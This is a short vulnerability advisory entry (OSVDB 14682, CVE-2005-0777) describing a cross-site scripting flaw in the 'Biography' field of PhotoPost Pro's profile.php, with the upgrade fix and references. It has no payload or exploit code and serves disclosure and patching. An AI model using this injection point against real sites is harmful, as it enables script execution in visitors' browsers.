PhotoPost Pro profile.php Biography Field XSS

2005-03-11T05:40:19
ID OSVDB:14682
Type osvdb
Reporter Igor Franchuk(sprog@online.ru)
Modified 2005-03-11T05:40:19

Description

Vulnerability Description

PhotoPost Pro contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate input in the 'Biography' field upon submission to the 'profile.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution Description

Upgrade to version 5.01 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

PhotoPost Pro contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate input in the 'Biography' field upon submission to the 'profile.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

References:

Vendor URL: http://www.photopost.com/ Secunia Advisory ID:14576 Related OSVDB ID: 14679 Related OSVDB ID: 14680 Related OSVDB ID: 14681 Related OSVDB ID: 14683 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-03/0200.html ISS X-Force ID: 19678 CVE-2005-0777 Bugtraq ID: 12779